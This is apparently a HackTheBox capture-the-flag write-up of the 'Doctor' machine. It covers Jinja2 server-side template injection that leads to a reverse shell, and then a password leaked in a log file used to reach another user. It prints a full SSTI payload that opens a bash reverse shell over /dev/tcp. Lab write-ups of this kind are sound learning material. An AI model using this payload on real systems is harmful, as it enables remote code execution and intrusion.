HackTheBox Writeup — Doctor

Hello Guys , I am Faisal Husaini. My username on HTB is “feodore” . Also join me on discord.

The IP of this box is

Port Scan

We find 3 Open Ports for SSH , Apache and Splunk

Moving towards the Web part first


We can see a host name doctors.htb in the website which we add to the hosts file and then move towards checking it on the browser

We get a login page, now I create a user and then login and see that there was a message posting functionality where I injected some template injection payloads

We dont see anything happening in backend, but looking on the gobuster results, we see that we have a /archive directory

Also if we check the source code after login, it also says that the directory is under beta testing

Checking the source code of /archive as it had all blank, we see that the payloads we injected , one of them got us a success

And throughout my testing I figured out the template engine being used is Jinja2


So I used the below payload from PayloadAllTheThings to get the reverse shell

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('bash -c "bash -i >& /dev/tcp/ 0>&1"').read()}}{%endif%}{%endfor%}

We got reverse shell and now move towards user escalation

The current user web has a group membership of adm which had file read permissions on various log files

One of the log files leaks a password which we try to use for user Shaun

Privilege Escalation

Hacker | Bug Hunter | Python Coder | Gamer | Reverse Engineering Lover